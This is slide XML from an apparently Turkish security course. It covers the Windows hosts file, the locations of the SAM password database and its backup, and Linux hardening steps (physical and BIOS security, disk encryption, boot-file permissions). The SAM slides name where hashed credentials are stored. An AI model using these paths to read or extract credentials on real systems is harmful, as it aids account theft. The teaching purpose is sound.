          <p:cNvPr id="751" name="Google Shape;751;p95"/>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300">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>%SYSTEMROOT%\System32\drivers\etc\hosts</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="Google Shape;752;p95"/>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127.0.0.1 ve ::1 yerel bilgisayarın IP adresini temsil eder ve genellikle localhost ile eşleştirilir.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192.168.1.2 IP adresi, example.com alan adına eşleştirilmiştir.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192.168.1.3 IP adresi, sample.com alan adına eşleştirilmiştir.</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p1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 Tartışma</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Google Shape;89;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="679925"/>
            <a:ext cx="8730900" cy="434400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="0" spcFirstLastPara="1" rIns="0" wrap="square" tIns="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Siz yazılımınızı açık kaynak kodlu dağıtır mısınız neden?</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Google Shape;90;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171350" y="1245950"/>
            <a:ext cx="4041600" cy="3323100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dağıtırım çünkü …</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="91" name="Google Shape;91;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4635450" y="1245950"/>
            <a:ext cx="4266900" cy="3323100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-355600" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dağıtman çünkü …</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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6" name="Shape 756"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="757" name="Google Shape;757;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="79650"/>
            <a:ext cx="78483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t>Kullanıcı password kayıt dosyası</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758" name="Google Shape;758;p96"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="4115400" cy="3351600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="759" name="Google Shape;759;p96"/>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300">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>%SYSTEMROOT%\system32 \ config\SAM</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="760" name="Google Shape;760;p96"/>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SAM dosyası, kullanıcı hesap bilgilerini (kullanıcı adları ve şifreler gibi) saklayan ve Windows işletim sistemi tarafından kullanılan bir veritabanıdır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="l">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SAM dosyası, güvenlik nedenleriyle genellikle kilitli ve okunamazdır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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4" name="Shape 764"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="765" name="Google Shape;765;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="79650"/>
            <a:ext cx="7848300" cy="43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t>Kullanıcı password kayıt dosyası yedekleri</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="766" name="Google Shape;766;p97"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1217400"/>
            <a:ext cx="4115400" cy="3351600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="767" name="Google Shape;767;p97"/>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300">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>%SYSTEMROOT%\repair\SAM</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:srgbClr val="00FF00"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768" name="Google Shape;768;p97"/>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dosya, Windows SAM (Security Accounts Manager) veritabanının yedeğini içerir.</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Bu dosyanın içeriği genellikle şifrelerin özetlenmiş hallerini içerir ve bu nedenle genellikle okunabilir bir metin dosyası değildir.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>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42936"/>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="773" name="Shape 773"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="774" name="Google Shape;774;p98"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1868950" y="67675"/>
            <a:ext cx="5490600" cy="43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US" sz="3400"/>
              <a:t>Linux </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3400"/>
              <a:t>Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="775" name="Google Shape;775;p98"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107650" y="741125"/>
            <a:ext cx="5013176" cy="3998000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="776" name="Google Shape;776;p98"/>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 by Matthew Horwood on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>github</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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0" name="Shape 780"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="781" name="Google Shape;781;p99"/>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Fiziksel Güvenlik</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="782" name="Google Shape;782;p99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230525" y="793150"/>
            <a:ext cx="4787100" cy="3895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Bilgisayar sistemlerinin ilk güvenlik katmanı fiziksel güvenliktir.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Sunucuya doğrudan erişim sağlayan kişilerin yetki ihtiyaci düzenli olarak kontrol edilmelidir.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Ev kullanıcıları için fiziksel güvenlik önemli olmayabilir, ancak büyük bir ISP için gereklidir.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Sunucu, kapalı ve iyi havalandırılmış bir ortama yerleştirilmelidir.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Harici cihazların takıldığı yerler, kilitlenebilen kasalar kullanılarak güvence altına alınmalıdır.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="783" name="Google Shape;783;p99"/>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images by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.ifsecglobal.com/physical-security/why-securing-physical-servers-is-crucial-for-data-protection/</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="784" name="Google Shape;784;p99"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="1297163"/>
            <a:ext cx="3925726" cy="2549173"/>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88" name="Shape 788"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Google Shape;789;p100"/>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BIOS Güvenliği</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="790" name="Google Shape;790;p100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4230525" y="793150"/>
            <a:ext cx="4787100" cy="3895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BIOS'a şifre eklenmeli ve erişimi sınırlanmalıdır, böylece kötü niyetli kullanıcıların sisteme girişi engellenir.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Disketten, CDROM'dan veya USB sürücüden başlatma izni verilmemeli; sadece hard diskten boot etmeye izin verilmelidir.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Bazen SCSI kontrolörlerinde BIOS'a şifre eklenemeyebilir, bu durumda CDROM kasası kilitli tutularak güvenlik sağlanabilir.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BIOS'taki otomatik ayar seçenekleri yerine hard disk ve IDE sürücüleri manuel olarak yapılandırılmalıdır.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Otomatik ayarlarda hata yapma olasılığı nedeniyle, manuel yapılandırmaya öncelik verilmelidir.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="791" name="Google Shape;791;p100"/>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3"/>
              </a:rPr>
              <a:t>pluralsight.com</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="792" name="Google Shape;792;p100"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152275" y="1090400"/>
            <a:ext cx="3925725" cy="296269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96" name="Shape 796"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="797" name="Google Shape;797;p101"/>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Sabit disk şifrele</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="798" name="Google Shape;798;p101"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5395600" y="793150"/>
            <a:ext cx="3621900" cy="3895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Çoğu Linux dağıtımı, kurulumdan önce disklerinizi şifrelemenize izin verir.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Disk şifreleme, hırsızlık durumunda önemlidir; çünkü bilgisayarınızı çalan kişi, sabit diski kendi makinesine bağlasa bile verilerinizi okuyamaz.</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Listeden üçüncü seçeneği seçin: Kılavuz kullanarak tüm diski kullanın ve şifreli LVM kurulumu yapın.</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1300">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="799" name="Google Shape;799;p101"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="1501" l="899" r="1300" t="12202"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76075" y="793162"/>
            <a:ext cx="5226650" cy="3464724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="800" name="Google Shape;800;p101"/>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4"/>
              </a:rPr>
              <a:t>pluralsight.com</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:srgbClr val="FFF2CC"/>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4" name="Shape 804"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="805" name="Google Shape;805;p102"/>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Boot klasörünü kilitle</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="806" name="Google Shape;806;p102"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4962675" y="793150"/>
            <a:ext cx="4054800" cy="3895200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2E3436"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="182875">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="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"boot" dizini, Linux çekirdeği ile ilgili önemli dosyaları içerir, bu nedenle bu dizinin salt okunur izinlere sahip olduğundan emin olmanız gerekir.</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chown root:root /etc/fstab</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chown root:root /etc/grub.conf</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="9144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chmod og-rwx /etc/grub.conf</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sed -i "/SINGLE/s/sushell/sulogin/" /etc/sysconfig/init</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="FFFFFF"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="❏"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sed -i "/PROMPT/s/yes/no/" /etc/sysconfig/init</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
